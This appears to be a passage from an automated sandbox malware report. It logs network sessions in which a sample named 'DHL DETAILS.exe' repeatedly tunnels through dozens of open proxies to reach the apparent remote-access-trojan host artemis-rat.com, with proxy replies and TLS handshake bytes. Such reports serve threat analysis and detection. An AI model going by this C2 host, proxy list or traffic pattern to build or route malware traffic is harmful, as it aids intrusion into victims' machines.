                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1332192.168.2.553890184.178.172.1741456352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:18.450768948 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1333192.168.2.553988143.110.232.177806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:18.453033924 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:18.973856926 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:19.568048000 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:20.703658104 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1334192.168.2.552567159.223.71.71512136352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:18.514275074 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:21.520834923 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:24.520962954 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:30.646358967 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1335192.168.2.55392045.196.151.9754326352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:18.514503956 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:18.731750011 CET308INHTTP/1.1 407 Proxy Authentication Required
                                                                                    Server: FaaS v1.3-20220203-7fa38bd5af
                                                                                    Date: Sat, 09 Mar 2024 12:14:18 GMT
                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                    Content-Length: 65
                                                                                    Proxy-Authenticate: Basic realm="Proxy"
                                                                                    Connection: close
                                                                                    Data Raw: 48 54 54 50 20 61 75 74 68 6f 72 69 7a 61 74 69 6f 6e 20 65 72 72 6f 72 3a 20 69 70 20 61 75 74 68 20 66 61 69 6c 65 64 2c 20 6e 6f 20 63 72 65 64 65 6e 74 69 61 6c 73 20 70 72 6f 76 69 64 65 64
                                                                                    Data Ascii: HTTP authorization error: ip auth failed, no credentials provided


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1336192.168.2.552315128.199.196.31577156352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:18.514671087 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:21.520833015 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:24.520967007 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:30.646352053 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1337192.168.2.55395934.83.143.631286352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:18.514698982 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:19.036418915 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:19.855993986 CET39INHTTP/1.1 200 Connection established


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1338192.168.2.553813222.179.155.9090916352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:18.519131899 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:18.884269953 CET325INHTTP/1.1 400 Bad Request
                                                                                    Server: nginx/1.12.1
                                                                                    Date: Sat, 09 Mar 2024 12:11:35 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 173
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 32 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.12.1</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1339192.168.2.55255345.5.118.439996352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:18.531162024 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:29.033529997 CET202INHTTP/1.0 404 Not Found
                                                                                    Content-Length: 715
                                                                                    Content-Type: text/html
                                                                                    Date: Thu, 22 Feb 2024 15:56:55 GMT
                                                                                    Expires: Thu, 22 Feb 2024 15:56:55 GMT
                                                                                    Server: Mikrotik HttpProxy
                                                                                    Proxy-Connection: close


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1340192.168.2.554007104.21.66.184806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:18.555448055 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:18.711312056 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:18 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1341192.168.2.554010104.23.107.172806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:18.557183981 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:18.711661100 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:18 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1342192.168.2.5538658.210.80.191156736352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:18.602957964 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1343192.168.2.553926159.203.61.16931286352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:18.607211113 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:20.911448956 CET28INHTTP/1.1 400 Bad Request


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1344192.168.2.553981154.16.116.16625126352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:18.610008955 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:19.270607948 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1345192.168.2.553811202.142.159.204310266352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:18.610033989 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1346192.168.2.554094211.234.125.54436352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:18.610795021 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1347192.168.2.5526555.44.42.115583866352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:18.610903978 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1348192.168.2.553854138.36.150.1610806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:18.619626045 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1349192.168.2.552636172.93.111.87158056352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:18.624571085 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:21.630197048 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1350192.168.2.55393118.228.198.164806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:18.630990028 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:18.957890987 CET116INHTTP/1.1 200 OK
                                                                                    Date: Sat, 09 Mar 2024 12:14:18 GMT
                                                                                    Server: nginx
                                                                                    Content-Type: text/plain
                                                                                    Content-Length: 0
                                                                                    Mar 9, 2024 13:14:18.991254091 CET177OUTData Raw: 16 03 03 00 ac 01 00 00 a8 03 03 65 ec 52 99 6e f5 fb 2f 4b 37 b2 31 cf 91 2c 06 51 38 92 d3 e0 e6 25 3b 58 ad 00 b0 75 7f 65 8b 00 00 2a c0 2c c0 2b c0 30 c0 2f 00 9f 00 9e c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c
                                                                                    Data Ascii: eRn/K71,Q8%;Xue*,+0/$#('=<5/Uartemis-rat.com#
                                                                                    Mar 9, 2024 13:14:19.321687937 CET1079INData Raw: 16 03 03 00 3d 02 00 00 39 03 03 1b c8 b7 a7 77 93 93 83 c1 dd 7b 1e 9b 61 5d 5a e3 55 ce 12 bf ec 8c a5 44 4f 57 4e 47 52 44 01 00 c0 30 00 00 11 ff 01 00 01 00 00 0b 00 04 03 00 01 02 00 17 00 00 16 03 03 02 b6 0b 00 02 b2 00 02 af 00 02 ac 30
                                                                                    Data Ascii: =9w{a]ZUDOWNGRD0000*H010Uartemis-rat.com0240309121340Z260309121340Z010Uartemis-rat.com0"0*H0Z~fVz'
                                                                                    Mar 9, 2024 13:14:19.326756954 CET93OUTData Raw: 16 03 03 00 25 10 00 00 21 20 ed 73 4e c2 06 3a 8d e8 a5 45 56 ae d5 39 c1 96 32 cf bd 96 be 80 08 21 da 72 1c 37 1f 0e 23 2e 14 03 03 00 01 01 16 03 03 00 28 00 00 00 00 00 00 00 00 57 e5 d1 4f 40 85 1e 27 ae 32 f2 e3 b2 30 72 3f 00 61 a6 34 a1
                                                                                    Data Ascii: %! sN:EV92!r7#.(WO@'20r?a4Cx9M?
                                                                                    Mar 9, 2024 13:14:19.652370930 CET51INData Raw: 14 03 03 00 01 01 16 03 03 00 28 a5 33 9f 77 c7 3d fd 19 9a 79 09 5f 9b 78 90 26 7f 1a f5 f0 6a aa 79 9b fb 86 c8 e5 05 77 b1 2e 41 3b eb dc e5 3d 12 e5
                                                                                    Data Ascii: (3w=y_x&jyw.A;=


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1351192.168.2.55394434.95.243.12280816352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:18.630990028 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1352192.168.2.55389413.234.24.11610806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:18.631658077 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:19.016696930 CET116INHTTP/1.1 200 OK
                                                                                    Date: Sat, 09 Mar 2024 12:14:18 GMT
                                                                                    Server: nginx
                                                                                    Content-Type: text/plain
                                                                                    Content-Length: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1353192.168.2.553903139.129.202.244806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:18.631767988 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:19.021594048 CET767INHTTP/1.1 403 Forbidden
                                                                                    Server: Beaver
                                                                                    Cache-Control: no-cache
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 635
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a
                                                                                    Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1354192.168.2.553938103.166.141.74200746352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:18.633539915 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
